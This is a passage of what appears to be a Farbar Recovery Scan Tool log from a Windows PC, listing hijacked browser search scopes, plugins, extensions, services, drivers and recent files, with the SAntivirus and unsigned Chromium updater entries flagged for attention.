SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=4&param3=campaignID%3D470%26UserID%3D1222810000&param4=XPbueSzfBeG6K2MlxBpfEDPN+SxVpua8beXQzoS1GYKgerVIJA/MgeyfUVeQOCXawoXuYOPEdQ2kll8rryAPp0J5pDTgf1kjsVJoMK5Sme337v6JF3fGCDVnOikgXtOGX5MsfV5o3f1y8jgIF9vtyPikm0FW8kvtMZJJtMjPNSAr9qv7isOGN1050MklNQ2ZkKakmrPMmOppyT7n6Sbw4XmmWWw0TgRScpY3vlLjuR6yljNS99eBpKn5S2OupFMkvdfTIxAMw+bFcuDcgIkq4HNWum+eY3c4vbIZqL25KgvCvOUQRJFSAKsSJb3l9Sf+Bwyd//1JZaPdM1ckm3EMLK4YHKDsY4kkojbK74fILJBMDLL+81wLUhs6QnD6OWPYEVzco9ahML8HKPbcDZP7rbF2Aq3g0hBVcDI6yH0F2DN8N5wR1xCvyE7XJ13gFrMONgoloTFWvxs5owdf6NgNEDaSc52H01v+JHri6UQlsrvwe/kjQevX2EhN0UHtVfq2kFcQp9+ZMM3eLYxPZqiOxgAJYkY8npoMCAgfJ8EZv5UfiN/1Mn3ElaHXVOOiGvjq9T/6uP5b/AnYJbRAOrris4QBHbV7xOzd2G+zavO14E7mP0wuxYKiiUDggxA3w2rge6u/HgFv4rymatWdXlhVW27SKaIC3x0R0x1xZNmtFpBWbt2H9rSehh9nmi7KxziNvEh+XdDMdQmigyWUk2tBAA==&p={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=4&param3=campaignID%3D470%26UserID%3D1222810000&param4=XPbueSzfBeG6K2MlxBpfEDPN+SxVpua8beXQzoS1GYKgerVIJA/MgeyfUVeQOCXawoXuYOPEdQ2kll8rryAPp0J5pDTgf1kjsVJoMK5Sme337v6JF3fGCDVnOikgXtOGX5MsfV5o3f1y8jgIF9vtyPikm0FW8kvtMZJJtMjPNSAr9qv7isOGN1050MklNQ2ZkKakmrPMmOppyT7n6Sbw4XmmWWw0TgRScpY3vlLjuR6yljNS99eBpKn5S2OupFMkvdfTIxAMw+bFcuDcgIkq4HNWum+eY3c4vbIZqL25KgvCvOUQRJFSAKsSJb3l9Sf+Bwyd//1JZaPdM1ckm3EMLK4YHKDsY4kkojbK74fILJBMDLL+81wLUhs6QnD6OWPYEVzco9ahML8HKPbcDZP7rbF2Aq3g0hBVcDI6yH0F2DN8N5wR1xCvyE7XJ13gFrMONgoloTFWvxs5owdf6NgNEDaSc52H01v+JHri6UQlsrvwe/kjQevX2EhN0UHtVfq2kFcQp9+ZMM3eLYxPZqiOxgAJYkY8npoMCAgfJ8EZv5UfiN/1Mn3ElaHXVOOiGvjq9T/6uP5b/AnYJbRAOrris4QBHbV7xOzd2G+zavO14E7mP0wuxYKiiUDggxA3w2rge6u/HgFv4rymatWdXlhVW27SKaIC3x0R0x1xZNmtFpBWbt2H9rSehh9nmi7KxziNvEh+XdDMdQmigyWUk2tBAA==&p={searchTerms}
SearchScopes: HKLM-x32 -> {99C2417D-5986-49E5-88A4-3ACE5730E4EA} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-3444092895-3226993445-944412456-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=4&param3=campaignID%3D470%26UserID%3D1222810000&param4=XPbueSzfBeG6K2MlxBpfEDPN+SxVpua8beXQzoS1GYKgerVIJA/MgeyfUVeQOCXawoXuYOPEdQ2kll8rryAPp0J5pDTgf1kjsVJoMK5Sme337v6JF3fGCDVnOikgXtOGX5MsfV5o3f1y8jgIF9vtyPikm0FW8kvtMZJJtMjPNSAr9qv7isOGN1050MklNQ2ZkKakmrPMmOppyT7n6Sbw4XmmWWw0TgRScpY3vlLjuR6yljNS99eBpKn5S2OupFMkvdfTIxAMw+bFcuDcgIkq4HNWum+eY3c4vbIZqL25KgvCvOUQRJFSAKsSJb3l9Sf+Bwyd//1JZaPdM1ckm3EMLK4YHKDsY4kkojbK74fILJBMDLL+81wLUhs6QnD6OWPYEVzco9ahML8HKPbcDZP7rbF2Aq3g0hBVcDI6yH0F2DN8N5wR1xCvyE7XJ13gFrMONgoloTFWvxs5owdf6NgNEDaSc52H01v+JHri6UQlsrvwe/kjQevX2EhN0UHtVfq2kFcQp9+ZMM3eLYxPZqiOxgAJYkY8npoMCAgfJ8EZv5UfiN/1Mn3ElaHXVOOiGvjq9T/6uP5b/AnYJbRAOrris4QBHbV7xOzd2G+zavO14E7mP0wuxYKiiUDggxA3w2rge6u/HgFv4rymatWdXlhVW27SKaIC3x0R0x1xZNmtFpBWbt2H9rSehh9nmi7KxziNvEh+XdDMdQmigyWUk2tBAA==&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3444092895-3226993445-944412456-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=4&param3=campaignID%3D470%26UserID%3D1222810000&param4=XPbueSzfBeG6K2MlxBpfEDPN+SxVpua8beXQzoS1GYKgerVIJA/MgeyfUVeQOCXawoXuYOPEdQ2kll8rryAPp0J5pDTgf1kjsVJoMK5Sme337v6JF3fGCDVnOikgXtOGX5MsfV5o3f1y8jgIF9vtyPikm0FW8kvtMZJJtMjPNSAr9qv7isOGN1050MklNQ2ZkKakmrPMmOppyT7n6Sbw4XmmWWw0TgRScpY3vlLjuR6yljNS99eBpKn5S2OupFMkvdfTIxAMw+bFcuDcgIkq4HNWum+eY3c4vbIZqL25KgvCvOUQRJFSAKsSJb3l9Sf+Bwyd//1JZaPdM1ckm3EMLK4YHKDsY4kkojbK74fILJBMDLL+81wLUhs6QnD6OWPYEVzco9ahML8HKPbcDZP7rbF2Aq3g0hBVcDI6yH0F2DN8N5wR1xCvyE7XJ13gFrMONgoloTFWvxs5owdf6NgNEDaSc52H01v+JHri6UQlsrvwe/kjQevX2EhN0UHtVfq2kFcQp9+ZMM3eLYxPZqiOxgAJYkY8npoMCAgfJ8EZv5UfiN/1Mn3ElaHXVOOiGvjq9T/6uP5b/AnYJbRAOrris4QBHbV7xOzd2G+zavO14E7mP0wuxYKiiUDggxA3w2rge6u/HgFv4rymatWdXlhVW27SKaIC3x0R0x1xZNmtFpBWbt2H9rSehh9nmi7KxziNvEh+XdDMdQmigyWUk2tBAA==&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3444092895-3226993445-944412456-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wsg_bjfpsso0w0_20_10_ssg00&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0A0F0CzytAzztAzzyD0ByD0CyEtB0FtN0D0Tzu0StBzyzzyEtN1L2XzuyEtFyCtCtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2StByBtDyByBzy0CtAtGtD0CyC0BtGzzyB0FzztGtBtBtC0DtGtDzy0FtBtD0ByE0AyB0D0B0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzyyCtCtBtD1TyB1QtG1P1S1S1OtGyEzyyCyBtGzzzy1RtBtGtDyB1Pzy1TtCtCyE1Q1TyByE2QtN0A0LzuyEtN1B2Z1V1T1S1NzutByDzytDyEtN1Q2Z1B1P1RzutCyDzztAtBzztAzzzztB%26cr%3D1969147934%26a%3Dwsg_bjfpsso0w0_20_10_ssg00%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3444092895-3226993445-944412456-1001 -> {99C2417D-5986-49E5-88A4-3ACE5730E4EA} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-20] (Microsoft Corporation -> Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2017-10-27] (HP Inc. -> HP Inc.)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2020-03-09] (Evernote Corporation -> Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-22] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2017-10-27] (HP Inc. -> HP Inc.)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF HKLM-x32\...\Firefox\Extensions: [firefox@bho.com] - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt
FF Extension: (HP SimplePass) - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt [2015-06-17] [Legacy] [not signed]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => not found
FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\mcafee\msc\npMcSnFFPl64.dll [No File]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @chbrowserupdate.com/Chromium Update;version=3 -> C:\Program Files (x86)\Chromium\Update\1.3.99.0\npChromiumUpdate3.dll [2020-03-03] (Chromium.) [File not signed]
FF Plugin-x32: @chbrowserupdate.com/Chromium Update;version=9 -> C:\Program Files (x86)\Chromium\Update\1.3.99.0\npChromiumUpdate3.dll [2020-03-03] (Chromium.) [File not signed]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Software Incorporated -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Software Incorporated -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Software Incorporated -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Software Incorporated -> Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\msc\npMcSnFFPl.dll [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-03-05] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default [2020-04-29]
CHR Notifications: Default -> hxxps://www.pinterest.com
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Extension: (Slides) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-14]
CHR Extension: (Docs) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-14]
CHR Extension: (Google Drive) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-06-24]
CHR Extension: (YouTube) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-06-24]
CHR Extension: (Lifesize Guest) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgmegfmapkpchpakidcpkjdhpobgeoeo [2020-03-26]
CHR Extension: (Games Lol) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjhnafljmcojokjmijlinlamlhcdndhg [2020-03-03]
CHR Extension: (uBlock Origin) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2020-02-07]
CHR Extension: (Google Search) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-06-22]
CHR Extension: (Sheets) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-14]
CHR Extension: (Google Docs Offline) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-03-11]
CHR Extension: (Search Selector) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\iicdcmjmlnliniifciehlchmdepfndfn [2020-03-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-03]
CHR Extension: (Gmail) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-26]
CHR Extension: (Chrome Media Router) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-02]
CHR Profile: C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Guest Profile [2020-01-11]
CHR Profile: C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\System Profile [2020-01-11]
CHR HKLM\...\Chrome\Extension: [bhdinjalofclbacjijgifpahcnjapclb]
CHR HKLM\...\Chrome\Extension: [iicdcmjmlnliniifciehlchmdepfndfn]
CHR HKU\S-1-5-21-3444092895-3226993445-944412456-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhdinjalofclbacjijgifpahcnjapclb]
CHR HKU\S-1-5-21-3444092895-3226993445-944412456-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [iicdcmjmlnliniifciehlchmdepfndfn]
CHR HKLM-x32\...\Chrome\Extension: [bhdinjalofclbacjijgifpahcnjapclb]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [iicdcmjmlnliniifciehlchmdepfndfn]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

"SAntivirusIC" => service was unlocked. <==== ATTENTION

S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2020-03-12] (Apple Inc. -> Apple Inc.)
S2 AVG Antivirus; C:\Program Files\AVG\Antivirus\AVGSvc.exe [345960 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 avgbIDSAgent; C:\Program Files\AVG\Antivirus\aswidsagent.exe [5552064 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S2 AvgWscReporter; C:\Program Files\AVG\Antivirus\wsc_proxy.exe [110608 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S2 chromium; C:\Program Files (x86)\Chromium\Update\ChromiumUpdate.exe [100352 2020-03-03] (Chromium.) [File not signed] <==== ATTENTION
S3 chromiumm; C:\Program Files (x86)\Chromium\Update\ChromiumUpdate.exe [100352 2020-03-03] (Chromium.) [File not signed] <==== ATTENTION
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2020-04-02] (Dropbox, Inc -> Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2020-04-02] (Dropbox, Inc -> Dropbox, Inc.)
S2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [44552 2020-04-14] (Dropbox, Inc -> Dropbox, Inc.)
S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [378744 2020-03-31] (HP Inc. -> HP Inc.)
S2 HPTouchpointAnalyticsService; C:\Program Files\HP\HP Touchpoint Analytics Client\TouchpointAnalyticsClientService.exe [332216 2017-11-21] (HP Inc. -> HP Inc.)
S2 ibtsiva; C:\WINDOWS\system32\ibtsiva.exe [184064 2017-03-09] (Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation)
S2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [370560 2018-09-19] (Intel Corporation -> Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel® Trusted Connect Service -> Intel® Corporation)
S3 Intel® Security Assist; C:\Program Files (x86)\Intel\Intel® Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [File not signed]
S2 IntelUSBoverIP; C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe [394184 2014-10-15] (Intel® Wireless Display -> Intel)
S2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel® Security Assist\isaHelperService.exe [7680 2015-05-19] () [File not signed]
S3 iumsvc; C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [177376 2016-08-12] (Intel® Update Manager -> Intel Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [207648 2015-10-16] (Intel Corporation - Embedded Subsystems and IP Blocks Group -> Intel Corporation)
S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [398184 2012-12-14] (Malwarebytes Corporation -> Malwarebytes Corporation) [File not signed]
S2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [682344 2012-12-14] (Malwarebytes Corporation -> Malwarebytes Corporation) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [310880 2018-09-05] (Intel Corporation -> )
S2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [103424 2015-01-30] (Softex Inc.) [File not signed]
S2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [902112 2015-12-14] (McAfee, Inc. -> Intel Security, Inc.)
S2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] (CyberLink Corp. -> )
S2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [316152 2016-03-29] (Realtek Semiconductor Corp -> Realtek Semiconductor)
S2 SAntivirusIC; C:\Program Files (x86)\SAntivirus\SAntivirusIC.exe [7053808 2020-02-14] (Digital Communications Inc -> Digital Com. Inc) <==== ATTENTION
S2 SAntivirusSvc; C:\Program Files (x86)\SAntivirus\SAntivirusService.exe [163312 2020-03-03] (Digital Communications Inc -> Digital Com. Incorporated) <==== ATTENTION
S2 Seagate Dashboard Services; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [16120 2017-05-10] (Seagate Technology LLC -> Seagate Technology LLC)
S2 Seagate MobileBackup Service; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe [143560 2017-09-16] (Seagate Technology LLC -> Seagate Technology LLC)
S2 Unchecky; C:\Program Files (x86)\Unchecky\bin\unchecky_svc.exe [297240 2018-04-08] (Reason Software Company Inc. -> Reason Software Company Inc.)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2001.10-0\NisSrv.exe [3285864 2020-02-27] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2001.10-0\MsMpEng.exe [103168 2020-02-27] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [4059744 2018-09-05] (Intel Corporation -> Intel® Corporation)
S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\Video Converter Ultimate\Transfer\DriverInstall.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 avgArDisk; C:\WINDOWS\System32\drivers\avgArDisk.sys [37960 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S1 avgArPot; C:\WINDOWS\System32\drivers\avgArPot.sys [206672 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S1 avgbidsdriver; C:\WINDOWS\System32\drivers\avgbidsdriver.sys [234840 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S0 avgbidsh; C:\WINDOWS\System32\drivers\avgbidsh.sys [179032 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S0 avgbuniv; C:\WINDOWS\System32\drivers\avgbuniv.sys [61272 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S0 avgElam; C:\WINDOWS\System32\drivers\avgElam.sys [16520 2020-03-03] (Microsoft Windows Early Launch Anti-malware Publisher -> AVG Technologies CZ, s.r.o.)
R1 avgKbd; C:\WINDOWS\System32\drivers\avgKbd.sys [43568 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S2 avgMonFlt; C:\WINDOWS\System32\drivers\avgMonFlt.sys [175984 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgRdr; C:\WINDOWS\System32\drivers\avgRdr2.sys [110064 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S0 avgRvrt; C:\WINDOWS\System32\drivers\avgRvrt.sys [85664 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S1 avgSnx; C:\WINDOWS\System32\drivers\avgSnx.sys [852392 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S1 avgSP; C:\WINDOWS\System32\drivers\avgSP.sys [459992 2020-04-16] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S2 avgStm; C:\WINDOWS\System32\drivers\avgStm.sys [235768 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S0 avgVmm; C:\WINDOWS\System32\drivers\avgVmm.sys [317864 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [231936 2019-09-10] (Microsoft Corporation) [File not signed]
S3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [230656 2017-03-09] (Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation)
S3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [24176 2012-12-14] (Malwarebytes Corporation -> Malwarebytes Corporation) [File not signed]
R3 NETwNb64; C:\WINDOWS\system32\DRIVERS\Netwbw02.sys [3595472 2018-10-12] (Intel® Wireless Connectivity Solutions -> Intel Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [896752 2015-08-07] (Realtek Semiconductor Corp -> Realtek )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402136 2016-10-20] (Realtek Semiconductor Corp -> Realsil Semiconductor Corporation)
S1 SANTIVIRUSKD; C:\Program Files (x86)\SAntivirus\SAntivirusKD.sys [90096 2020-03-03] (Digital Communications Inc. -> Digital Comm. Inc) <==== ATTENTION
S3 usb3Hub; C:\WINDOWS\System32\drivers\usb3Hub.sys [213296 2014-10-15] (Intel® Wireless Display -> Windows ® Win 7 DDK provider)
S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [45960 2020-02-27] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [376544 2020-02-27] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [53984 2020-02-27] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-04-29 12:14 - 2020-04-29 12:16 - 000000000 ____D C:\FRST
2020-04-29 12:14 - 2020-04-29 12:15 - 000000000 ____D C:\Users\JLO Squared\Desktop\New folder
2020-04-29 12:11 - 2020-04-29 12:12 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\TeamViewer
2020-04-29 12:10 - 2020-04-29 12:10 - 018215008 _____ (TeamViewer) C:\Users\JLO Squared\Downloads\TeamViewerQS.exe
2020-04-29 12:08 - 2020-04-29 12:08 - 000118472 _____ C:\WINDOWS\ntbtlog.txt
2020-04-29 12:08 - 2020-04-29 12:08 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2020-04-29 12:06 - 2020-04-29 12:06 - 000000000 _____ C:\WINDOWS\system32\last.dump
2020-04-18 00:22 - 2020-04-29 12:00 - 000000000 ____D C:\Users\TEMP.Office
2020-04-17 18:09 - 2020-04-17 18:09 - 000321536 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbadmin.exe
2020-04-17 18:09 - 2020-04-17 18:09 - 000179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.XamlHost.dll
2020-04-17 18:09 - 2020-04-17 18:09 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.XamlHost.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 025444352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 019850240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 019812864 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramWorld.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 018027520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
